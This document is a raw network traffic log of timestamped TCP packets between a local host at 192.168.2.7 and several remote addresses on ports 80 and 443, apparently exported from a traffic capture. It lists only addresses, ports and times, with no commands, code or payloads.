Nov 2, 2024 17:56:55.368437052 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.368480921 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.368482113 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.368524075 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.368556976 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.368601084 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.368623972 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.368637085 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.368649006 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.368671894 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.368696928 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.368799925 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.368849039 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.368851900 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.368892908 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.368921041 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.368937016 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.368962049 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.369015932 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.391828060 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.391849041 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.391864061 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.391880035 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.391907930 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.391990900 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.392003059 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.392057896 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.392096043 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.392106056 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.392117977 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.392154932 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.392235041 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.392246962 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.392277956 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.392312050 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.392323017 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.392354965 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.399982929 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.400002956 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.400049925 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.400064945 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.400093079 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.400110960 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.403321981 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.403336048 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.403418064 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.403425932 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.403474092 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.437628984 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.437649012 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.437659979 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.437733889 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.437733889 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.486567020 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.486620903 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.486634970 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.486644030 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.486677885 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.486979008 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.487044096 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.487056017 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.487092972 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.487121105 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.487281084 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.487325907 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.487350941 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.487363100 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.487394094 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.487478971 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.487489939 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.487531900 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.487657070 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.487711906 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.487714052 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.487725973 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.487752914 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.487804890 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.487871885 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.487883091 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.487895012 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.487914085 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.487920046 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.487945080 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.487973928 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.488125086 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.488141060 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.488153934 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.488177061 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.488198042 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.488244057 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.488286018 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.488313913 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.488325119 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.488354921 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.488373041 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.488395929 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.488406897 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.488420010 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.488435030 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.488445044 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.488471031 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.488559008 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.488568068 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.488600016 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.510951042 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.511027098 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.511034966 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.511039972 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.511069059 CET	443	49969	18.245.124.39	192.168.2.7
Nov 2, 2024 17:56:55.511080980 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.511081934 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.511094093 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.511116028 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.511142015 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.511142015 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.511169910 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.511182070 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.511215925 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.511248112 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.511257887 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.511296988 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.511298895 CET	49969	443	192.168.2.7	18.245.124.39
Nov 2, 2024 17:56:55.511318922 CET	443	49969	18.245.124.39	192.168.2.7
Nov 2, 2024 17:56:55.511714935 CET	443	49969	18.245.124.39	192.168.2.7
Nov 2, 2024 17:56:55.512013912 CET	49969	443	192.168.2.7	18.245.124.39
Nov 2, 2024 17:56:55.512079954 CET	443	49969	18.245.124.39	192.168.2.7
Nov 2, 2024 17:56:55.512242079 CET	49969	443	192.168.2.7	18.245.124.39
Nov 2, 2024 17:56:55.519952059 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.520024061 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.521946907 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.521964073 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.522033930 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.522042990 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.522054911 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.522141933 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.556256056 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.556328058 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.556340933 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.556360006 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.556392908 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.556416035 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.556428909 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.556440115 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.556457996 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.556571007 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.559331894 CET	443	49969	18.245.124.39	192.168.2.7
Nov 2, 2024 17:56:55.563802004 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.563823938 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.563873053 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.563891888 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.563951969 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.563951969 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.575421095 CET	49980	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:55.575474977 CET	443	49980	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:55.575690985 CET	49980	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:55.575922012 CET	49980	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:55.575939894 CET	443	49980	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:55.605981112 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.606019974 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.606033087 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.606062889 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.606080055 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.606209040 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.606264114 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.606276035 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.606327057 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.606360912 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.606373072 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.606411934 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.606420994 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.606468916 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.606522083 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.606534958 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.606564999 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.606576920 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.606623888 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.606697083 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.606836081 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.606904984 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.606915951 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.606930017 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.606947899 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.606956005 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.606962919 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.607029915 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.607059956 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.607072115 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.607100010 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.607125044 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.607207060 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.607219934 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.607234955 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.607248068 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.607259035 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.607284069 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.607306004 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.607403994 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.607440948 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.607616901 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.607662916 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.607664108 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.607676983 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.607703924 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.607724905 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.607801914 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.607814074 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.607841969 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.607855082 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.607880116 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.607953072 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.607964993 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.607994080 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.608025074 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.614692926 CET	443	49970	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.616024971 CET	49970	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.616064072 CET	443	49970	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.616539955 CET	49970	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.616547108 CET	443	49970	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.630120993 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.630158901 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.630172968 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.630177021 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.630192995 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.630220890 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.630306005 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.630317926 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.630351067 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.630361080 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.630444050 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.630456924 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.630479097 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.630496979 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.630505085 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.630542040 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.641552925 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.641685963 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.655798912 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.655842066 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.655874968 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.655886889 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.655936956 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.670418978 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.670438051 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.670531988 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.670531988 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.670543909 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.675637960 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.675709963 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.676228046 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.676240921 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.676280022 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.676312923 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.676354885 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.681224108 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.681317091 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.690308094 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.690349102 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.690383911 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.690396070 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.690407038 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.690434933 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.690465927 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.690752983 CET	49959	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:55.690772057 CET	443	49959	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:55.699846029 CET	443	49969	18.245.124.39	192.168.2.7
Nov 2, 2024 17:56:55.699923038 CET	443	49969	18.245.124.39	192.168.2.7
Nov 2, 2024 17:56:55.700164080 CET	49969	443	192.168.2.7	18.245.124.39
Nov 2, 2024 17:56:55.700612068 CET	49969	443	192.168.2.7	18.245.124.39
Nov 2, 2024 17:56:55.700625896 CET	443	49969	18.245.124.39	192.168.2.7
Nov 2, 2024 17:56:55.700675964 CET	49969	443	192.168.2.7	18.245.124.39
Nov 2, 2024 17:56:55.700695038 CET	49969	443	192.168.2.7	18.245.124.39
Nov 2, 2024 17:56:55.701426029 CET	443	49971	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.702795982 CET	49971	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.702811956 CET	443	49971	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.703275919 CET	49971	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.703279972 CET	443	49971	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.714015961 CET	443	49972	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.714411974 CET	49972	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.714430094 CET	443	49972	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.714827061 CET	49972	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:55.714832067 CET	443	49972	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.725305080 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.725325108 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.725337029 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.725361109 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.725393057 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.730092049 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.730103016 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.730113983 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.730153084 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.730154991 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.730169058 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.730185032 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.730211020 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.734911919 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.734930992 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.734941959 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.734967947 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.734992981 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.735002995 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.735017061 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.735027075 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.735057116 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.735075951 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.739655018 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.739670038 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.739696026 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.739710093 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.739711046 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.739722013 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.739734888 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.739736080 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.739778042 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.739789009 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.744412899 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.744427919 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.744438887 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.744477034 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.744479895 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.744486094 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.744493961 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.744518995 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.744545937 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.749160051 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.749175072 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.749218941 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.749233007 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.749245882 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.749258041 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.749279976 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.749300003 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.753866911 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.753881931 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.753931999 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.753947973 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.754070997 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.758624077 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:55.758673906 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:55.758693933 CET	443	49970	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:55.758745909 CET	80	49933	62.204.41.163	192.168.2.7
